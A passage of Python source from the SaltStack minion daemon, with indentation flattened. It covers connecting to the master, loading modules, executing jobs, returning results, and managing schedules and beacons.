self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
